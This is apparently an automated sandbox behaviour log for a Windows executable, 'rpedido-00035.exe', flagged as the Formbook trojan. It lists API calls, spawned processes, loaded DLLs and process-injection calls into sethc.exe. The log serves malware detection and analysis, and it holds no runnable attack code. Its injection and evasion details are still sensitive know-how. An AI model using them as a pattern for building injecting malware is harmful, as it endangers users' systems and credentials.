            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502BE0 NtQueryVirtualMemory,4_2_04502BE0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043DF01D NtQueryInformationProcess,4_2_043DF01D
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043E3C88 NtResumeThread,4_2_043E3C88
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043E3648 NtSetContextThread,4_2_043E3648
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043E4698 NtMapViewOfSection,4_2_043E4698
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043E3FA8 NtQueueApcThread,4_2_043E3FA8
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043DF033 NtQueryInformationProcess,4_2_043DF033
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043DF028 NtQueryInformationProcess,4_2_043DF028
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043E3968 NtSuspendThread,4_2_043E3968
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043E4A66 NtUnmapViewOfSection,4_2_043E4A66
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489
            Source: C:\Users\user\Desktop\rpedido-00035.exeFile created: C:\Windows\resources\0409Jump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_00404D900_2_00404D90
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_00406ABA0_2_00406ABA
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603C6002_2_3603C600
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360BD62C2_2_360BD62C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360CD6462_2_360CD646
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360446702_2_36044670
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360206802_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DA6C02_2_360DA6C0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601C6E02_2_3601C6E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360936EC2_2_360936EC
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DF6F62_2_360DF6F6
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360D67572_2_360D6757
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360227602_2_36022760
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602A7602_2_3602A760
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360204452_2_36020445
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360EA5262_2_360EA526
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DF5C92_2_360DF5C9
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360D75C62_2_360D75C6
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360D124C2_2_360D124C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600D2EC2_2_3600D2EC
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602E3102_2_3602E310
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DF3302_2_360DF330
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360113802_2_36011380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360CE0762_2_360CE076
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3605508C2_2_3605508C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360100A02_2_360100A0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602B0D02_2_3602B0D0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360D70F12_2_360D70F1
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360E010E2_2_360E010E
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600F1132_2_3600F113
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360BD1302_2_360BD130
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3606717A2_2_3606717A
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360251C02_2_360251C0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603B1E02_2_3603B1E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36040E502_2_36040E50
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360C0E6D2_2_360C0E6D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360D0EAD2_2_360D0EAD
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36021EB22_2_36021EB2
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360D9ED22_2_360D9ED2
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36012EE82_2_36012EE8
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602CF002_2_3602CF00
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DFF632_2_360DFF63
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DEFBF2_2_360DEFBF
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360D1FC62_2_360D1FC6
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36026FE02_2_36026FE0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36010C122_2_36010C12
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602AC202_2_3602AC20
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360CEC4C2_2_360CEC4C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36023C602_2_36023C60
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360D6C692_2_360D6C69
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DEC602_2_360DEC60
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360B9C982_2_360B9C98
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36038CDF2_2_36038CDF
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603FCE02_2_3603FCE0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360EACEB2_2_360EACEB
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601AD002_2_3601AD00
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DFD272_2_360DFD27
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360D7D4C2_2_360D7D4C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36020D692_2_36020D69
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36032DB02_2_36032DB0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36029DD02_2_36029DD0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360BFDF42_2_360BFDF4
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DCA132_2_360DCA13
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DEA5B2_2_360DEA5B
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DFA892_2_360DFA89
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603FAA02_2_3603FAA0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36020B102_2_36020B10
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DFB2E2_2_360DFB2E
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044D04454_2_044D0445
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0453D4804_2_0453D480
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0459A5264_2_0459A526
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0458F5C94_2_0458F5C9
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_045875C64_2_045875C6
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0457D6464_2_0457D646
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044F46704_2_044F4670
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044EC6004_2_044EC600
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0456D62C4_2_0456D62C
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0458A6C04_2_0458A6C0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044CC6E04_2_044CC6E0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0458F6F64_2_0458F6F6
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_045436EC4_2_045436EC
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044D06804_2_044D0680
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_045867574_2_04586757
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044D27604_2_044D2760
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044DA7604_2_044DA760
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0457E0764_2_0457E076
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044DB0D04_2_044DB0D0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_045870F14_2_045870F1
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0450508C4_2_0450508C
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044C00A04_2_044C00A0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0451717A4_2_0451717A
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0459010E4_2_0459010E
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044BF1134_2_044BF113
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0456D1304_2_0456D130
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044D51C04_2_044D51C0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044EB1E04_2_044EB1E0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0458124C4_2_0458124C
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044BD2EC4_2_044BD2EC
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044DE3104_2_044DE310
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0458F3304_2_0458F330
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044C13804_2_044C1380
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0457EC4C4_2_0457EC4C
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044D3C604_2_044D3C60
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04586C694_2_04586C69
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0458EC604_2_0458EC60
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044C0C124_2_044C0C12
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044DAC204_2_044DAC20
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044E8CDF4_2_044E8CDF
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044EFCE04_2_044EFCE0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0459ACEB4_2_0459ACEB
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04569C984_2_04569C98
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04587D4C4_2_04587D4C
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044D0D694_2_044D0D69
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044CAD004_2_044CAD00
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0458FD274_2_0458FD27
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044D9DD04_2_044D9DD0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0456FDF44_2_0456FDF4
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044E2DB04_2_044E2DB0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04512E484_2_04512E48
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044F0E504_2_044F0E50
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04570E6D4_2_04570E6D
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04589ED24_2_04589ED2
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044C2EE84_2_044C2EE8
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04580EAD4_2_04580EAD
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044D1EB24_2_044D1EB2
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0458FF634_2_0458FF63
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044DCF004_2_044DCF00
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04581FC64_2_04581FC6
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044D6FE04_2_044D6FE0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0458EFBF4_2_0458EFBF
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044B68684_2_044B6868
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0458F8724_2_0458F872
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044D98704_2_044D9870
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044EB8704_2_044EB870
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044D38004_2_044D3800
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044FE8104_2_044FE810
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_045708354_2_04570835
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_045818DA4_2_045818DA
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044D28C04_2_044D28C0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_045878F34_2_045878F3
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044E68824_2_044E6882
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_045498B24_2_045498B2
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_045159C04_2_045159C0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044CE9A04_2_044CE9A0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0458E9A64_2_0458E9A6
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0458EA5B4_2_0458EA5B
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0458CA134_2_0458CA13
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0458FA894_2_0458FA89
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044EFAA04_2_044EFAA0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0450DB194_2_0450DB19
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044D0B104_2_044D0B10
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_0458FB2E4_2_0458FB2E
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04544BC04_2_04544BC0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043DF01D4_2_043DF01D
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043DE4654_2_043DE465
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043DE4634_2_043DE463
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043DE7FD4_2_043DE7FD
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043DD8684_2_043DD868
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043DE97C4_2_043DE97C
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043DCB084_2_043DCB08
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043DE3484_2_043DE348
            Source: C:\Windows\SysWOW64\sethc.exeCode function: String function: 04505050 appears 36 times
            Source: C:\Windows\SysWOW64\sethc.exeCode function: String function: 0454EF10 appears 105 times
            Source: C:\Windows\SysWOW64\sethc.exeCode function: String function: 0453E692 appears 84 times
            Source: C:\Windows\SysWOW64\sethc.exeCode function: String function: 044BB910 appears 266 times
            Source: C:\Windows\SysWOW64\sethc.exeCode function: String function: 04517BE4 appears 88 times
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: String function: 36067BE4 appears 76 times
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: String function: 3608E692 appears 80 times
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: String function: 3600B910 appears 190 times
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: String function: 3609EF10 appears 78 times
            Source: rpedido-00035.exeStatic PE information: invalid certificate
            Source: rpedido-00035.exe, 00000000.00000000.43566959444.0000000000457000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameloyaliteters radierne.exeR vs rpedido-00035.exe
            Source: rpedido-00035.exe, 00000002.00000003.44782208695.0000000035DAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rpedido-00035.exe
            Source: rpedido-00035.exe, 00000002.00000003.44785542514.0000000035F65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rpedido-00035.exe
            Source: rpedido-00035.exe, 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rpedido-00035.exe
            Source: rpedido-00035.exe, 00000002.00000003.44836446752.0000000005CAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesethc.exej% vs rpedido-00035.exe
            Source: rpedido-00035.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.evad.winEXE@5/8@2/2
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_00404814 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404814
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_004020FE LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_004020FE
            Source: C:\Users\user\Desktop\rpedido-00035.exeFile created: C:\Users\user\AppData\Local\Temp\nszDD93.tmpJump to behavior
            Source: rpedido-00035.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\rpedido-00035.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rpedido-00035.exeReversingLabs: Detection: 18%
            Source: C:\Users\user\Desktop\rpedido-00035.exeFile read: C:\Users\user\Desktop\rpedido-00035.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\rpedido-00035.exe "C:\Users\user\Desktop\rpedido-00035.exe"
            Source: C:\Users\user\Desktop\rpedido-00035.exeProcess created: C:\Users\user\Desktop\rpedido-00035.exe "C:\Users\user\Desktop\rpedido-00035.exe"
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\sethc.exe "C:\Windows\SysWOW64\sethc.exe"
            Source: C:\Users\user\Desktop\rpedido-00035.exeProcess created: C:\Users\user\Desktop\rpedido-00035.exe "C:\Users\user\Desktop\rpedido-00035.exe"Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\sethc.exe "C:\Windows\SysWOW64\sethc.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sethc.exeSection loaded: playsndsrv.dllJump to behavior
            Source: C:\Windows\SysWOW64\sethc.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Windows\SysWOW64\sethc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\sethc.exeSection loaded: dui70.dllJump to behavior
            Source: C:\Windows\SysWOW64\sethc.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sethc.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sethc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
